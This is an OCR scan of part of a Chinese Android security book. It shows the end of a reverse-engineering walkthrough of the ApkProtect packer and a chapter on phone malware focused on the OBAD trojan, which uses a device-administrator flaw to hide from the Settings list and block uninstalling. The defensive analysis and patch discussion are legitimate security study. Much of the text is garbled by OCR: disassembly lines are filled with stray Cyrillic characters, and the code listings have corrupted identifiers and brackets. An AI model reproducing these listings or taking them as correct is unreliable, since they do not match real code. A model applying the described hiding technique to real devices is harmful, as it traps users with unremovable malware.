图 18-52 返回 到 函数 Init 中 


其 中 , R5 是 ClassObject*, 在 此 比较 DexFile.pOptHeader 是 否 为 空 , 然后 把 dexLength+(odex header size) 
放 到 var 248 中 。 首 先 根据 apk_protector_runtime 的 mprotect_flag 值 进行 判断 ,此 时 mprotect_flag 的 值 是 true。 
(11) 调用 sub 80403270() 或 者 sub_804032A0() 来 初始 化 指针 并 修改 结构 ， 设 置 mprotect Пар 的 值 为 

true， 接 下 来 开始 对 dex magic 进行 检查 操作 ， 有 具体 流程 如 图 18-53 所 示 。 


图 18-53 对 dex magic 进行 检查 


еее 


(12) 开始 分 析 ClassObjects-pDvmDex->DexFile->pHeader 一 线 的 流程 ， 如 图 18-54 所 示 。 


(ввавзас 
(ввлвзмас loc 89A03AAC 


8Baa3anE LOR — R5, [R3] 
Івпыззаво LOR — RB. [85.24] 
|30493482 LOR R8, 80x60] 
ванэ3һёп сир R3, no 
[80493486 BGT loc 80A034BR 


- 
18-54 ClassObjects-pDvmDex->DexFile->pHeader 一 线 的 流程 


此 时 RO 是 DexFile 的 pHeader, R3 是 DexHeader 的 classDefsSize。 继 续 后 面 的 流程 ， 如 图 18-55 所 示 。 


JJ 


Ж; [SP .sex25geoar_2nn] 
R2, [SP sx259evar_2n9]| 
RT 


lsoneance Lon 
(веһозаро LOR ва, [RS,80xC] 
5003402 1515 R2, Ri, 82 
|ввавзара оп R2, [RZ,R3] 
8080386 оп нз, [85,88] 
|ввһозаов LSLS М2, R2, а? 
(вваозара LOR — R3, [82,83] 
|враозаос ADDS нз, RO, R3 


aeweswoe 

|aeweswpE loc_seweawpE 

seweawpE LORB — R2, [R3] 
Т: 


图 18-55 ”后面 的 流程 


此 时 R11 是 Odex 中 dex 的 mapped address，R4 用 来 检查 堆栈 。 
(13) 来 到 loc 804034C6， 此 时 RS 已 经 不 是 apk_protector_runtime， 而 是 一 个 DexFile* 类 型 的 指针 。 
依据 图 18-56 所 示 的 流程 可 以 得 出 DexFile +0x1c 的 偏 移 是 const DexClassDef*pClassDefs。 


CEI 
волозлас 

80A03ARC loc 80A03ARC 
sewneswnc LDR вз, [RS ,W0x28] 
sene3wnE LOR — RS, [R3] 
|волозаве LOR — RO, [R5,83] 
[80403482 LOR вз, [R0,80x60] 
|ввлозава сир R3, mo 
80403486 вст loc 80A03ABR 


图 18-56 ”得 到 DexFile +0x1c 的 偏 移 


此 步骤 对 应 的 DexClassDef 结构 的 代码 如 下 所 示 。 
r 
* Direct-mapped "class_def_item". 


e. 


sirs бию — — 


让 
typedef struct DexClassDef { 
u4 classldx; /* index into typelds for this class */ 
u4 accessFlags; 
u4 superclassldx; /* index into typelds for superclass */ 
u4 interfacesOff; /* file offset to DexTypeList */ 
u4 SsourceFileldx; /* index into stringlds for source file name */ 
u4 annotationsOff; /* file offset to annotations directory item */ 
u4 classDataOff; /* file offset to class data item */ 
u4 staticValuesOff; /* file offset to DexEncodedArray */ 
} DexClassDef; 
pClassDefs 指针 初始 化 的 流程 如 下 所 示 。 
口 PathClassLoad 
О DexFile.LoadDex 
О DexFile Construction function 
О JNlopenDexFile 
О Dalvik dalvik system DexFile openDexFile 
О dvmJarFileOpen 
О dvmDexFileOpenFromFd 
О dexFileSetupBasicPointers 


最 后 依次 返回 上 述 流程 对 应 的 源码 如 下 所 示 。 


* Set up the basic raw data pointers of a DexFile. This function isn't 

* meant for general use. 

vil 

void dexFileSetupBasicPointers(DexFile* pDexFile, const u1* data) { 
DexHeader *pHeader = (DexHeader*) data; 


pDexFile->baseAddr = data; 
pDexFile->pHeader = pHeader; 
pDexFile->pStringlds = (const DexStringld*) (data + pHeader->stringldsOff); 
pDexFile->pTypelds = (const DexTypeld*) (data + pHeader->typeldsOff); 
pDexFile->pFieldids = (const DexFieldld*) (data + pHeader-»fieldldsOff); 
pDexFile->pMethodlds = (const DexMethodld*) (data + pHeader-»methodldsOff); 
pDexFile->pProtolds = (const DexProtold*) (data + pHeader->protoldsOff); 
pDexFile->pClassDefs = (const DexClassDef*) (data + pHeader->classDefsOff); 
pDexFile->pLinkData = (const DexLink*) (data + pHeader->linkOff); 

} 

(14) 分 离 出 DexFile* pTypelds(0xc). рЅігіпе145(0х8) 47, fE IDA Pro 中 的 注释 如 图 18-57 所 示 。 
(15) 函数 sub 8040256C0 是 Android 源码 中 的 dexReadAndVerifyClassData， 对 应 的 指令 原型 如 下 
所 示 。 

typedef struct DexClassData { 
DexClassDataHeader header; 
DexField* staticFields; 
DexField* instanceFields; 
DexMethod* directMethods; 
DexMethod* virtualMethods; 

} DexClassData; 


CHOED] 


图 18-57 注释 说 明 


通过 如 下 代码 可 知 ， 返 回 sub 8040256C Ja, RO 存储 的 是 一 个 DexClassData 指针 。 
DexClassData* dexReadAndVerifyClassData(const u1** pData, const u1* pLimit); 
(16) 开始 复制 栈 操作 流程 ， 如 图 18-58 所 示 。 
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图 18-58 ”复制 栈 流程 
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其 中 ，_d_ptr 就 是 d， 如 图 18-59 所 示 。 


626 : UUUUUUUU U FUNC GLOBAL DEFAULT UND memcpy 
627 23: 000020bc 256 OBJECT GLOBAL DEFAULT 7 d 
oa 2a. nnnnoafa 37 уп пт RFFAHLT 9 mahi datum 


18-59 d ptr 和 _d 的 对 应 
其 中 ，R4 是 DexMethod 结构 ， 此 处 内 存 如 图 18-60 所 示 。 


|09209230 св 67 вв вв во вв ве өв 
图 18-60 ”内存 


图 18-60 中 选中 的 部 分 就 是 一 个 DexCode 结构 ， 有 具体 代码 如 下 所 示 。 
typedef struct DexCode ( 
registersSize; 
insSize; 
outsSize; 
triesSize; 
debuglnfoOff; /* file offset to debug info stream */ 
insnsSize; /* size of the insns array, in u2 units */ 
insns[1]; 
/* followed by optional u2 padding */ 
I“ followed by try. item[triesSize] */ 
/* followed by uleb128 handlersSize */ 
I“ followed by catch handler item[handlersSize] */ 
) DexCode; 
C17) 最 后 看 Inti 调用 完成 的 操作 ， 有 具体 流程 如 图 18-61 所 示 。 
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图 18-61 Inti 调用 完成 的 操作 


到 此 为 止 ， 函 数 Java com apkprotect InitO) 的 实现 过 程 全 部 分 析 完 毕 。 虽 然 没 有 分 析 解 密 方法 的 内 容 ， 
但 是 已 经 了 解 了 ApkProtect 的 具体 保护 原理 。 
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第 19 章 ”常见 炳 毒 分 析 


当今 智能 手机 越 来 越 普及 ， 因 此 可 以 自由 上 网 的 应 用 软件 一 直 存 在 着 很 大 的 安全 隐患 。 人 们 的 生活 已 
经 离 不 开 手机 ， 但 是 大 家 可 能 不 知道 ， 电 话 通 话 、 短 信 收 发 和 通讯 录 却 并 不 安全 ， 很 有 可 能 被 非法 人 员 盗 
取 。 本 章 将 详细 讲解 当今 常见 手机 病毒 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


19.1 常见 病毒 的 入 侵 方 式 


© 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 19 章 \ 常 见 病毒 的 入 侵 方式 .avi 

对 于 手机 病毒 ， 必 须 先 了 解 它 们 的 传播 方式 和 攻击 方法 ， 才 能 更 有 效 地 进行 有 针对 性 的 防治 。 在 当今 
技术 环境 下 ， 手 机 病毒 的 常见 传播 方式 及 预防 方法 如 下 。 

(1) 诱骗 用 户 下 载运 行 

2004 年 8 月 6 日 ，“ 布 若 达 ” 病 毒 被 发 现 。 利 用 “ 布 若 达 ” 病 毒 ， 攻 击 者 不 但 可 以 偷窃 中 毒手 机 里 的 
电话 号 码 和 电子 邮件 ， 还 可 以 对 手机 进行 远程 控制 ， 运 行 多 种 危险 指令 。 

对 于 这 类 手机 病毒 ， 预 防 方法 是 在 使 用 手机 上 网 功能 时 ， 尽 量 从 正规 网 站 上 下 载 信息 ， 尽 量 少 从 不 知 
名 的 小 型 网 站 下 载 图 片 铃 声 ， 不 要 随意 在 一 些 网 站 上 登记 自己 的 手机 号 码 ， 以 免 感染 上 手机 病毒 。 可 浏览 
网 页 的 手机 尽量 不 要 浏览 个 人 人、 黑客、 色情 网 站 。 不 要 随意 安装 来 路 不 明 的 手机 程序 。 

(2) 病毒 短信 或 乱码 电话 方式 

这 种 方式 是 目前 手机 病毒 的 主要 攻击 方式 。 病 毒 会 发 出 一 串 由 怪 字符 组 成 的 病毒 短信 。 乱 码 电话 则 是 
会 在 来 电 显示 中 显示 乱码 ， 一 旦 接听 乱码 电话 ， 则 会 感染 上 病毒 ， 机 内 所 有 设 定 都 可 能 被 破坏 。 

对 于 这 类 手机 病毒 ， 预 防 方法 是 不 要 轻易 打开 陌生 人 发 送 的 短信 息 ， 更 不 要 转发 ， 应 及 时 删除 。 如 果 
键盘 被 锁 死 ， 可 以 取 下 电池 后 开机 再 删除 ， 如 果 仍 无 法 删除 ， 可 以 尝试 将 手机 卡 换 到 另 一 型 号 的 手机 上 删 
除 ， 如 果 病 毒 一 直 占据 内 在 ， 无 法 进行 清除 ， 可 以 将 手机 拿 到 厂商 维修 部 重 写 芯片 程序 。 当 来 电 显示 乱码 
电话 时 ， 用 户 应 不 接听 或 立即 把 电话 关闭 。 

(3) 蓝牙 方式 传播 

2004 年 12 月 ，“ 卡 波 尔 ”病毒 在 上 海 被 发 现 ， 该 病毒 会 修改 智能 手机 的 系统 设置 ， 使 用 户 每 次 开机 都 
会 先 运行 此 病毒 ， 被 感染 的 手机 出 现 锁 死 和 无 法 开机 的 状态 。 同 时 该 病毒 还 会 自动 发 送 给 其 他 用 户 。 

对 于 这 类 手机 病毒 ， 建 议 带 蓝牙 功能 的 手机 用 户 将 蓝牙 功能 属性 设 为 “隐藏 ”， 以 防 被 病毒 搜索 到 。 
利用 “无 线 传送 ”功能 例如 蓝牙 、 红 外 线 接收 信息 时 ， 要 注意 选择 安全 可 靠 的 传送 对 象 ， 如 果 有 陌生 设备 
搜索 请 求 链 接 最 好 不 要 接受 。 

(4) 病毒 感染 计算 机 上 的 手机 可 执行 文件 

2005 年 1 月 11 日，“ 韦 拉 斯 科 ” 病 毒 被 发 现 ， 该 病毒 感染 计算 机 后 ， 会 搜索 计算 机 硬盘 上 的 SIS 可 执 
行文 件 并 进行 感染 ， 导 致 手机 数据 丢失 。 

对 于 这 类 手机 病毒 ,预防 方法 是 建议 用 户 在 把 SIS 文件 传送 到 手机 之 前 ,最 好 用 杀毒 软件 进行 扫描 , 确 
认 无 毒 后 再 运行 。 另 外 ， 用 户 尽量 避免 从 非 正 规 网 站 下 载 手机 程序 、 游 戏 。 


soe pasam 


(5) 利用 MMS 多 媒体 信息 服务 方式 来 传播 

2005 年 4 月 4 日 ,美国 一 家 反 病 毒 厂 商 F-Secure 对 外 称 ， 手 机 病毒 以 前 大 多 通过 蓝牙 方式 传播 ， 但 是 
现在 也 能 够 通过 MMS 多 媒体 信息 服务 方式 来 传播 ， 造 成 死机 和 数据 丢失 。 

对 于 这 类 手机 病毒 ， 预 防 方法 是 进入 手机 主 菜单 ， 禁 止 CommWarrior 这 一 应 用 功能 ， 然 后 删除 该 病毒 
安装 的 目录 就 可 以 除去 这 一 病毒 。 安 全 公司 F-Secure 和 McAfee 公司 均 给 出 了 CommWarrior 病毒 在 感染 手 
机 中 安装 的 目录 位 置 。 

(6) 用 杀毒 软件 保障 手机 的 安全 

提起 手机 病毒 的 预防 措施 不 得 不 提 到 手机 杀毒 软件 。 针 对 手持 设备 病毒 的 日 趋 猩 狐 ， 安 全 厂商 都 推出 
了 针对 手机 平台 的 安全 软件 产品 ， 国 内 用 户 可 以 直接 到 金山 、360、 日 月 光华 、 网 秦 等 国内 杀毒 网 站 下 载 安 
装 手机 杀毒 软件 。 部 分 手机 购买 时 已 经 附带 手机 杀毒 软件 ， 手 机 用 户 可 以 省 去 这 个 步骤 。 如 果 已 经 感染 手 
机 病毒 ， 请 立即 通过 无 线 网 站 对 手机 进行 杀毒 ， 或 通过 手机 的 IC 接 入 口 或 红外 传输 接口 进行 杀毒 。 


192 OBAD 木马 
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北京 时 间 2013 年 6 月 8 日 ， 据 国外 媒体 报道 ， 俄 罗斯 安全 厂商 卡巴 斯 基 公 司 周 五 宣布 发 现 一 种 史上 最 
复杂 的 Android A, Android 手机 一 旦 感染 该 木马 ， 将 被 恶意 扣 费 ， 并 失去 设备 管理 员 权限 ， 无 法 删除 该 
木马 。OBAD 木马 也 称 安 卓 木 马 (ANDROIDOS_OBAD) ， 属 于 木马 家 族 之 一 ， 可 通过 论坛 、WiFi 以 及 蓝 
牙 等 方式 进行 传播 ， 并 恶意 攻击 安 卓 系统 漏洞 。 感 染 了 OBAD 木马 的 Android 手机 会 自动 向 增值 服务 号 码 
发 送 短信 , 并 自动 安装 一 些 其 他 恶意 软件 。 此 外 , 该 木马 还 能 通过 蓝牙 将 恶意 软件 安装 至 其 他 Android 手机 ， 
而 且 可 以 在 Android 控制 台中 执行 远程 命令 。 卡 巴 斯 基 的 专家 表示 , OBAD 木马 会 通过 代码 混淆 的 方式 将 自 
己 隐藏 起 来 ， 并 能 够 对 一 些 新 发 现 的 Android 漏洞 进行 攻击 。 正 因为 如 此 ， 安 全 专家 很 难 对 该 木马 进行 追踪 
并 修补 相关 漏洞 。 最 危险 的 是 ，OBAD 木马 能 够 窃取 管理 员 权限 ， 而 且 系统 中 不 会 列 出 木马 所 注册 的 设备 
管理 器 ， 从 而 导致 用 户 几乎 玫 失 对 被 该 种 木马 感染 设备 的 管理 权限 。 在 本 节 的 内 容 中 ， 将 详细 讲解 OBAD 
木马 的 基本 知识 。 


19.2.1 感染 过 程 分 析 


随 着 Android 系统 的 普及 ， 对 应 的 手机 木马 与 病毒 也 随 之 不 断 进化 ， 具 备 了 越 来 越 强 大 的 攻击 能 力 。 在 
这 个 背景 下 ， 号 称 史 上 最 强 木马 的 OBAD 诞生 了 。 这 是 一 种 会 “隐身 ” 且 “ 无 法 删除 ”的 安 卓 木马 ， 一 旦 
成 功 侵入 用 户 系统 ， 就 会 在 手机 桌面 和 设备 管理 员 管 理 画 面 上 自动 隐藏 ， 极 其 不 易 清除 。 

ANDROIDOS ОВА” 木马 一 旦 攻击 成 功 ， 将 会 自动 尝试 打开 WiFi 连接 ， 连 接 到 黑客 早已 部 署 的 远程 
服务 器 上 ， 肆 意 窃 取 联 系 人 、 通 话 记录 等 用 户 信息 ， 订 购 高 额 付费 服务 ， 并 可 能 操控 手机 下 载 或 是 向 其 他 
手机 散播 恶意 软件 。 

与 大 多 数 木马 程序 不 同 的 是 ，ANDROIDOS_OBAD 具备 “隐形 ”以 及 “防止 被 移 除 ” 的 特点 ， 该 木马 
启动 后 ， 会 自动 要 求 用 户 授予 其 手机 Root 以 及 设备 管理 员 等 权限 ， 用 户 若 不 同意 ， 只 要 开启 设备 就 会 不 停 
跳出 要 求 用 户 同 意 的 窗口 ， 一 旦 取得 手机 的 设备 管理 员 权 限 ， 就 会 在 手机 桌面 和 设备 管理 员 管 理 界面 上 隐 
藏 且 无 法 被 删除 ， 在 未 解除 管理 员 权限 的 情况 下 ， 用 户 或 是 信息 安全 软件 将 无 法 清除 该 木马 程序 。 

ANDROIDOS ОВА” 木马 程序 一 旦 被 安装 ， 将 会 不 停 发 送 要 求 用 户 同意 其 取得 设备 管理 员 的 信息 。 
ANDROIDOS ОВА” 木马 程序 一 旦 取得 手机 的 设备 管理 员 权限 ， 可 自行 隐藏 ， 使 一 般 用 户 无 法 察觉 ， 降 低 
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其 遭 删 除 的 可 能 性 。 
19.22 360 分 析 报 告 


最 近 有 媒体 爆料 ， 最 高 级 的 Android 木马 已 经 现 身 ， 据 称 它 能 利用 Android 操作 系统 此 前 未 知 的 漏洞 提 
升 程序 权限 ， 并 能 阻止 被 卸载 。 该 恶意 程序 被 称 为 Backdoor.AndroidOS.Obad.a， 其 恶意 行为 是 通过 悄悄 向 
增值 服务 号 码 发 送 短信 获 利 。Android 无 法 发 现 并 且 无 法 卸载 。 就 此 ，360 手机 安全 专家 做 了 深度 剖析 ， 详 
解 攻破 “最 强 木马 ”三 层 防 查 杀 的 整个 过 程 。 

第 一 层 : 封 堵 病 毒 分 析 主要 入 口 ， 阻 止 安全 工程 师 获 取 安 全 信息 。 

首先 ，360 手机 安全 专家 发 现 ， 该 木马 为 逃避 杀毒 软件 查 杀 确实 煞费苦心 。 它 在 代码 中 采取 了 一 些 专门 
针对 病毒 分 析 人 员 的 措施 ， 为 安全 公司 分 析 增 加 难度 。 例如， 大 多 数 安全 公司 分 析 Android 木马 样本 时 ， 通 
常 采 用 AXML 解析 工具 来 解析 样本 的 主 配置 文件 一 一 AndroidManifest.xml 文件 。 该 文件 包含 了 Android 应 
用 的 主要 模块 入 口 信息 ， 是 木马 分 析 时 的 重要 线索 。Obad.a 木马 故意 构造 了 一 个 非 标准 的 
AndroidManifest.xml 文件 ， 使 得 病毒 分 析 人 员 无 法 得 到 完整 数据 ， 如 图 19-1 所 示 。 

<application =*.COcCccl"> ` zm 
<activity *"System" *".CCOIoll*» 


<intent-filter> 
*action androidinamee"android.intent.action.MAIN" /> 


«category android:inamew"android.intent.category.LAUNCHER^ /> 
</intent-filter> 
</activity> 
*activity ="System" =".cCoIOIOo" ="singleTop” /> 
*service =*.OCOcC011" /> 
<receiver *"System" *".0CllCoO" *"android.permission.BIND DEVICE ADMIN"> 
*«meta-data *"android.app.device admin" *'éxml/ccclocc" /> 
<intent-filter> 
<action android:name="com.strain.admin.DEVICE_ADMIN ENABLED" /> 
</intent-filter> 
</receiver> 
<вегуісе *".MainService" /> 
*roceiver =",1001С0сІ"> 
<intent-filter ="1000"> 
*action androidrnamee"android.intent.action.BOOT COMPLETED" /> 
*action android:name="android. intent.action.QUICKBOOT_POWERON" /> 


图 19-1 第 一 层 


第 二 层 : 对 指令 代码 进行 特殊 处 理 ， 阻 止 反 编译 。 

该 木马 除了 对 代码 进行 加 密 处 理 以 外 ， 还 通过 对 指令 代码 进行 特殊 处 理 ， 使 得 安全 公司 常用 的 Java 反 
编译 工具 无 法 正确 地 反 编译 其 指令 ， 增 加 对 木马 的 分 析 难 度 。 

第 三 层 : 利用 系统 缺陷 阻止 用 户 务 载 。 

Ai AERE ABB HIE, Android 系统 从 2.2 版 本 开始 ， 该 木马 煞费苦心 提供 了 一 个 “设备 管理 器 ” 
的 功能 ， 其 初衷 是 为 企业 部 署 远程 IT 控制 使 用 ， 为 了 防止 员工 私自 卸载 企业 安装 的 “设备 管理 器 ”， 一 旦 
激活 设备 管理 器 之 后 ， 该 设备 管理 器 就 不 可 删除 。 但 是 ， 由 于 Android 系统 对 此 功能 设计 得 不 完善 ， 使 得 木 
马 可 以 利用 这 个 机 制 ， 让 自己 注册 成 为 一 个 设备 管理 器 ， 从 而 阻止 用 户 务 载 。 木 马 首先 会 提示 用 户 激活 设 
备 管理 器 ， 如 图 19-2 所 示 。 而 一 旦 用 户 不 愤 单 击 了 “激活 ”按钮 ， 那 么 木马 就 被 注册 成 了 设备 管理 器 ， 此 
时 “强行 停止 ”和 “ 务 载 ” 按 钮 将 完全 失效 ， 即 木马 无 法 关闭 ， 也 无 法 卸载 ， 如 图 19-3 所 示 。 

最 可 怕 的 是 , 设备 管理 器 还 存在 一 定 缺陷 , 当 木 马 故 意 以 一 种 错误 的 方式 来 注册 设备 管理 器 时 , Android 
系统 也 能 让 它 注册 成 功 ， 但 是 在 设备 管理 器 列表 中 不 会 显示 。 用 户 因 此 找 不 到 取消 注册 设备 管理 器 入 口 ， 
无 法 取消 木马 的 设备 管理 权限 ， 如 图 19-4 所 示 。 


soe ruasan 0000 
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Fisxscausum 


Э 应 用 信息 
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图 19-2 提示 “激活 设备 管理 器 ” 图 19-3 木马 被 注册 成 设备 管理 器 


如 此 精心 布防 给 安全 厂商 带 来 不 小 的 麻烦 ， 据 360 手机 安全 专家 介绍 ，360 拥有 强大 的 “动态 沙 箱 分 析 
系统 ”， 当 Backdoor.AndroidOS.Obad.a 木马 试图 窃取 用 户 隐 私 、 发 送 短信 吸 费时 ，360 的 主动 防御 系统 会 
进行 拦截 ， 提 醒 用 户 木 马 正在 尝试 获取 本 机 号 码 等 危险 操作 ， 如 图 19-5 所 示 。 


. 


《 国 i 备 管理 名 


没有 可 供 显示 的 设备 管理 各 


图 19-4 ” 找 不 到 取消 注册 设备 管理 器 入 口 图 19-5 360 保护 


而 Backdoor.AndroidOS.Obad.a 木马 所 利用 的 Android 系统 未 知 漏洞 ，360 手机 安全 中 心 在 2012 年 早已 
率先 发 现 。 据 360 手机 安全 专家 介绍 ， 去 年 在 分 析 一 款 名 为 LockMe 的 应 用 时 ， 发 现 其 触发 了 Android 的 一 
个 系统 缺 隐 ， 导 致 无 法 正常 卸载 。 

“史上 最 强 Android 木马 ”虽然 没有 传说 中 和 危 言 等 听 ， 但 仍 需 小 心 警惕 。360 手机 安全 专家 介绍 ， 手 机 
只 需要 安装 最 新 版 本 的 360 手机 卫士 ， 就 可 以 联网 查 杀 该 木马 。 在 此 360 对 Android 用 户 提出 了 如 下 建议 。 

а 如 果 安 装 应 用 提示 注册 设备 管理 器 时 ， 应 确认 这 是 可 靠 的 应 用 。 

О 如 果 用 户 不 愤 激 活 了 设备 管理 器 ， 导 致 应 用 无 法 被 务 载 时 ， 可 以 用 360 手 机 卫士 “软件 管家 ”的 强 


3) 


1 Android 系统 安全 和 反 编译 实战 


力 印 载 功 能 将 其 彻底 卸载 。 
а 启用 360 手 机 卫士 的 主动 防御 功能 ， 可 拦截 未 知 木马 。 
口 及 时 升级 360 手 机 卫士 最 新 病毒 库 ， 定 期 联网 云 查 杀 ， 以 查 杀 最 新 的 木马 和 病毒 。 
注意 : 上 述 内 容 参 考 自 360 手 机 卫士 安全 播报 第 116 期 《[ 安 全 播报 ]“ 史 上 最 强 Android 木 马 ” 现 身 ? 360 
手机 安全 专家 全 面 剖 析 》。 


19.2.3 Android 的 设备 管理 器 漏洞 


木马 OBAD 利用 Android 的 设备 管理 器 的 漏洞 ， 当 用 户 激活 设备 管理 器 后 ,木马 OBAD 会 在 setting i 
备 管理 器 列表 隐藏 ， 应 用 程序 激活 成 设备 管理 器 后 ， 可 以 实现 锁 屏 、 控 除 用 户 数据 等 功能 ， 并 且 无 法 使 用 
常规 的 卸载 方式 对 其 印 载 。 

Android 在 实现 设备 管理 器 时 ， 需 要 在 文件 manifestxml 中 注册 一 个 广播 接收 者 ， 具 体 代 码 如 下 所 示 。 


<receiver 


android:name=".MyDeviceAdmin" 
android:permission-"android.permission.BIND DEVICE ADMIN" > 
<meta-data 
android:name-"android.app.device admin" 
android:resource="@xml/device_admin" /> 


<intent-filter> 
«action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> 
</intent-filter> 
</receiver> 
OBAD 通过 分 析 Setting 的 源码 , 得 到 了 在 setting 的 管理 器 列表 隐藏 自己 的 答案 .相关 代码 在 文件 packages apps! 
Settings\src\com\android\settings\DeviceAdminSettings.java 中 实现 ， 具 体 代码 如 下 所 示 。 
void updateList() ( 
mActiveAdmins.clear(); 
List<ComponentName> cur = mDPM.getActiveAdmins(); 
if (cur != null) { 
for (int i=0; i<cur.size(); i++) { 
mActiveAdmins.add(cur.get(i)); 
} 


} 
/清除 信息 
11 тАуаїаЫеАатіпѕ setting 的 设备 管理 器 列表 
List<Resolvelnfo> avail = getActivity().getPackageManager().queryBroadcastReceivers( 
new Intent(DeviceAdminReceiver.ACTION DEVICE ADMIN ENABLED), 
PackageManager.GET META DATA); 
/获取 所 有 注册 了 DeviceAdminReceiver. ACTION DEVICE ADMIN ENABLED, BD android.app. 
action.DEVICE ADMIN ENABLED action 的 广播 接收 者 列表 avail 
int count = avail == null ? 0 : avail.size(); 
for (int i20; i<count; i++) { 
Resolvelnfo ri = avail.get(i); 
try( 
DeviceAdminInfo dpi = new DeviceAdminlnfo(getActivity(), ri); 


if (dpi.isVisible() || mActiveAdmins.contains(dpi.getComponent())) { 
mAvailableAdmins.add(dpi); 


@ 


soe nasom 


// 如 果 应 用 注册 了 包含 该 action 的 广播 接收 者 并 且 激活 了 设备 管理 器 ， 就 会 在 setting 的 设备 管理 器 列 


表 中 显示 
) catch (XmlPullParserException e){ 
Log.w(TAG, "Skipping " + ri.activityInfo, e); 
} catch (IOException e) ( 
Log.w(TAG, "Skipping " + ri.activityInfo, e); 
5 
H 


getListView().setAdapter(new PolicyListAdapter()); 


在 上 述 代码 中 ， 在 没有 注册 android.app.action.DEVICE ADMIN ENABLED action 应 用 的 前 提 下 也 可 以 
激活 为 设备 管理 器 ， 这 就 导致 了 激活 后 的 设备 管理 器 无 法 在 setting 的 设备 管理 器 列表 中 显示 。 

究竟 如 何 解决 这 种 漏洞 情况 呢 ? 下 面 我 们 一 起 来 分 析 一 下 安全 管家 的 设备 管理 器 补丁 〈 补 丁 资源 在 本 
书 附属 配套 资源 中 ) 。 安 全 管家 的 设备 管理 器 补丁 是 一 个 正常 的 APK 文件 ， 反 编译 后 会 得 到 如 图 19-6 所 示 


的 代码 结构 。 
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19-6 ”代码 结构 
其 中 核心 类 DeviceAdminProxy 的 主要 实现 代码 如 图 19-7 所 示 。 
在 上 述 代码 中 ， 核 心 功 能 是 对 比如 下 两 个 列表 。 
Па 直接 通过 DevicePolicyManager 获 得 已 经 激活 的 设备 管理 器 列表 a。 
О 通过 遍历 注册 了 android.app.action.DEVICE_ADMIN_ENABLED action 的 列表 b。 
如 果 发 现 列 表 a 中 的 设备 管理 器 没有 在 列表 b 中 出 现 ， 就 调用 如 图 19-8 所 示 的 代码 弹出 
的 Activity 界面 ， 目 的 是 让 用 户 手 动 取消 。 


-个 取消 激活 
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public static List a(Context paramContext) 
t 
List localListi = ((DevicePolicyManager)paramContext.getSystemService ("device policy")).getActiveAdmins(); 
Object localobjecti; 
if ((localList1 == null) || (locallisti.size() 一 0)) 
localObjectl = null; 
while (true) 
t 
return localObjecti; 
PackageManager localPackageManager = paramContext.getPackageManager() ; 
Intent localIntent = new Intent("android.app.action.DEVICE ADMIN ENABLED"); 
List locallist2 = localPackageManager.queryBroadcastReceivers(localIntent, 128); 
Object localObject2 = new LinkedList(); 
Iterator locallteratorl = locallist2.iterator(); 
label74: break labell4£; 
Іаре175: if (!locallteratorl.hasNext()) 
localObject2 = ((List)localObject2).iterator(); 
while (true) 
{ 
if (!((Iterator)localObject2) .hasNext ()) 
I 
if ((localListl != null) ss (locallistl.size() != 0)) 
break label219; 
localObjectl = null; 
break; 
String str = ((ResolveInfo)locallteratorl.next()).activityInfo.packageName; 
Iterator locallterator2 = locallistl.iterator(); 
labell48: if (!localIterator2.hasNext()) 
break label75; 
localObjectl = (ComponentName)localIterator2.next(); 
if (!((ComponentName) local0bject1) .getPackageName() equals (str) ) 
break label74; 
boolean Ьоо11 = ((List)localObject2) .add(localObjecti):; 
break label75; 
} 
ComponentName localComponentName = (ComponentName) ((Iterator)localObject2).next(); 
boolean bool2 = localList1.remove (localComponentName) ; 
) 
1abel219: localObjecti = locallisti; 
} 


图 19-7 核心 类 DeviceAdminProxy 


Intent localIntent1 = new Intent(); 

Intent localIntent2 = localIntentl.setClassName ("com.android.settings", "com.android.settings.DeviceAdminAdd"); 
Intent localIntent3 = localIntentl.putExtra("android.app.extra.DEVICE ADMIN", localComponentName) ; 
startActivity(localIntentl); 


图 19-8 弹出 一 个 取消 激活 的 Activity 


在 上 述 代码 中 ， 类 RootMain 在 能 获得 root 权限 时 使 用 ， 找 到 利用 这 个 漏洞 的 设备 管理 器 后 直接 调用 类 
DevicePolicyManager 的 方法 removeActiveAdmin0 取 消 激活 ， 该 方法 需要 system 以 上 权限 才能 执行 。 

由 此 可 见 ， 安 全 管家 的 漏洞 补丁 只 是 提供 给 用 户 查找 系统 中 使 用 该 漏洞 的 应 用 程序 ， 并 调用 系统 的 取 
消 激活 界面 的 方式 来 实现 帮助 清除 恶意 的 APK 的 目的 ， 但 是 并 没有 从 根本 上 解决 问题 。 在 Android 4.4.2 版 
本 中 ， 谷 歌 官方 从 根本 上 解决 了 这 个 问题 ， 解 决 方案 在 文件 packages\apps\Settings\src\com\android\ 
settings\DeviceAdminAdd.java 中 实现 ， 对 应 解决 代码 如 下 所 示 。 


119 // When activating, make sure the given component name is actually a valid device admin. 
120 /No need to check this when deactivating, because it is safe to deactivate an active 

121 ll invalid device admin 

122 if (ImDPM.isAdminActive(cn)) { 

123 List<Resolvelnfo> avail = getPackageManager().queryBroadcastReceivers( 

124 new Intent(DeviceAdminReceiver.ACTION DEVICE ADMIN ENABLED), 
125 PackageManager.GET DISABLED UNTIL USED COMPONENTS); 

126 int count = avail == null ? 0 : avail.size(); 

127 boolean found - false; 


128 for (int 


i<count; i++) ( 


129 Resolvelnfo ri = avail.get(i); 

130 if (ai.packageName.equals(ri.activityInfo.packageName) 

131 && ai.name.equals(ri.activityInfo.name)) { 

132 ty{ 

133 // We didn't retrieve the meta data for all possible matches, so 
134 ll need to use the activity info of this specific one that was retrieved. 
135 ri.activityInfo = ai; 

136 DeviceAdmininfo dpi = new DeviceAdminlnfo(this, ri); 
137 found = true; 

138 } catch (XmlPullParserException e) { 

139 Log.w(TAG, "Ваа" + ri.activityInfo, e); 

140 } catch (IOException e) { 

141 Log.w(TAG, "Ваа" + ri.activityInfo, e); 

142 } 

143 break; 

144 } 

145 } 

146 if (!found) { 

147 Log.w(TAG, "Request to add invalid device admin: " + cn); 
148 finish(); 

149 return; 

150 } 

151 } 


19.2.4 分 析 OBAD 


OBAD 木马 的 DEX 文件 中 的 所 有 字符 串 都 是 被 加 密 的 ， 并 且 使 用 了 复杂 的 代码 混淆 技术 ， 如 图 19-9 


所 示 。 

在 卡巴 斯 基 实 验 室 产品 中 心 检测 此 木马 程序 为 Backdoor.AndroidOS. 
Obad.a。OBAD 的 作者 在 流行 的 DEX2JAR 软件 〈 用 于 将 APK 文件 转换 成 易 读 
